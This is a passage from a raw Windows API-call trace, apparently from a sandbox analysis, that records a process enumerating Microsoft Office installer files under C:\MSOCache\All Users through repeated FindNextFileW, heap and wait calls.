dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0071.570] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.570] lstrlenW (lpString="branding.xml") returned 12 [0071.570] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10a) returned 0x1312878 [0071.570] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 0 [0071.570] FindClose (in: hFindFile=0x70cf40 | out: hFindFile=0x70cf40) returned 1 [0071.571] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.571] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0071.571] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.571] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0071.571] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0071.571] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.571] lstrlenW (lpString="AccessMUISet.xml") returned 16 [0071.571] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf8) returned 0x70b8e8 [0071.572] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.572] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.572] lstrlenW (lpString="Setup.xml") returned 9 [0071.572] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x70b2d0 [0071.572] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0071.572] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.572] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.572] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0071.572] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.572] lstrlenW (lpString="{91140000-0011-0000-1000-0000000FF1CE}-C") returned 40 [0071.572] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.619] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.619] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.619] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0071.619] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.619] lstrlenW (lpString="Office32WW.msi") returned 14 [0071.619] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0071.619] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.619] lstrlenW (lpString="Office32WW.xml") returned 14 [0071.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf4) returned 0x70c358 [0071.620] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0071.620] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.620] lstrlenW (lpString="ose.exe") returned 7 [0071.620] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0071.620] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.620] lstrlenW (lpString="osetup.dll") returned 10 [0071.620] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0071.620] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.620] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0071.620] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0071.620] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.620] lstrlenW (lpString="PidGenX.dll") returned 11 [0071.620] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0071.620] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.620] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0071.620] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x108) returned 0x70b680 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0071.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf4) returned 0x70b790 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="ProPrWW.cab") returned 11 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="setup.exe") returned 9 [0071.621] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.621] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.621] lstrlenW (lpString="Setup.xml") returned 9 [0071.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x70c160 [0071.622] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0071.622] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.622] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0071.622] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.622] lstrlenW (lpString="{91140000-003B-0000-1000-0000000FF1CE}-C") returned 40 [0071.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.626] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.649] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.649] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0071.649] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.649] lstrlenW (lpString="Office32WW.msi") returned 14 [0071.649] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0071.649] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.649] lstrlenW (lpString="Office32WW.xml") returned 14 [0071.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf4) returned 0x70c458 [0071.649] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0071.649] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.649] lstrlenW (lpString="ose.exe") returned 7 [0071.649] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0071.649] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.649] lstrlenW (lpString="osetup.dll") returned 10 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0071.650] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.650] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0071.650] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.650] lstrlenW (lpString="PidGenX.dll") returned 11 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0071.650] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.650] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0071.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x108) returned 0x1312990 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0071.650] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.650] lstrlenW (lpString="PrjProrWW.msi") returned 13 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0071.650] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.650] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0071.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf2) returned 0x1312aa0 [0071.650] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0071.651] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.651] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0071.651] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, 